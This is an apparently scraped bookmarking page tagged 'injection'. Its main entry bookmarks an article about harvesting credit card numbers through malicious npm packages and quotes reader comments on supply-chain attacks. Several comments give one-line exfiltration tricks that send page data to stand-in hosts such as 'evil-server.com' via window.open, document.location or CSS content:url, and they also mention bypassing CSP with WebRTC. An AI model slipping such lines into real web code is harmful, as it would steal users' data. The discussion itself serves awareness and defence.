injection   3167

« earlier    

I’m harvesting credit card numbers and passwords from your site. Here’s how.
Extremely legit concern.

Comments:

* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open(‘https://legit-analytics.com?q=${payload}', ‘_blank’).close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.


* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had little limitations to what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..

https://github.com/w3c/webappsec-csp/issues/92"

* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some css.
e.g. something::after { content:url(“evilserver.com/userdatastring”) }"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open  source 
yesterday by dandv
Angular Testing: provide injected @Attribute in TestBed - Stack Overflow
The parameter passed to the constructor is always null. Does anybody know a solution? I'm using Angular 5.2.10.
attribute  angular  injection 
28 days ago by vespertilian
The Beginners Guide to Codecaves - CodeProject
0xCC or 0x00 sections where you can inject your own code
exploitation  code  injection  research  security 
6 weeks ago by plaxx
lmacken/pyrasite: Inject code into running Python processes
GitHub is where people build software. More than 27 million people use GitHub to discover, fork, and contribute to over 80 million projects.
github  debug  python  injection  inject  code  gdb  author  community:irc#pyrasite 
8 weeks ago by Spark

« earlier    

related tags

(di)  (popular  -  2014  2018  3d  3dprinting  404  academic  addiction  address  admin  against  alternative  analysis  android  angular  angular2  ankle  appsec  as  aspnetcore  async  attack  attacks  attribute  author  automation  b12  baltimore  benefit  bg  blacklist  book  bookmark  breaker  broken  browser-bridge  browser  brute  buildup  c  carbon  carburetor  carburetors  carburettor  chaos  cheat  cheats  cheatsheet  china  cleaning  clevermarks  code  comment  community:irc#pyrasite  comparison  concrete  constructor  control  corticosteroid  cost  crhesi  cryptocurrencies  css  csv  dagger  data  database  db  dcrs  debug  debugger  debugging  dependencies  dependency  dependencyinjection  deserialization  design  development  dexter  di  direct  distributing  dpendency  drop  drugs  drupal8  dylib  dynamic  ef  electron  electronic  email  encoding  engineering  entity  epoxy  evidence  excel  exploit  exploitation  extruding  ezjs  facet  facilities  factory  fault  fix  forece  framework  fuel  fun  funny  game-dev  games  gdb  gdi  github  good  google  gravel  guice  hack  hacking  harm  health  herader  host  hot  how  howto  html  ignition  indiemfg  information  infosec  inject  injectionmolding  input  insite  instapaper  intake  inversion  ioc  ios  jailbreak  java  javascript  joint  js  kapsule  kodein  koin  kotlin  language  ldnont  library  linker  linux  macro  mailsploit  malware  mazda  medical  memory-hacking  memory  mining  module  moulding  mta  network  neurotomy  node.js  node  nodejs  npm  nrtv  object  of  open  opensource  oral  pain  parsing  pathcer  pentest  pentesting  performance  periarticular  php  plastic  plugin  poc  point  preload  printing  programming  prototyping  pyringe  python  query  radar  rails  rdbms  realtime  reduction  reference  regexp  relief  reload  repair  research  reverse  rfc-1342  rfc  rfc1342  safe  sanitize  santization  scala  scanner  script  scripts  security  sender  serialization  service  servicelocator  skyactiv  sla  slide  so  software  source  spoofing  spotify  spring  sql-injection  sql  sqli  sqlinjection  sqlmap  ssti  stackoverflow  standards  static  steroid  strings  study  supervised  swift  synode  system  techniques  technology  template  test  thread  to  tool  tools  tops  troll  ui  user  utilities  ux  valve  vendor  video  vulnerabilities  vulnerability  web  webdev  whitepaper  wiki  windows  with  wordpress  xcode  xkcd  xml  xss 

Copy this bookmark:



description:


tags: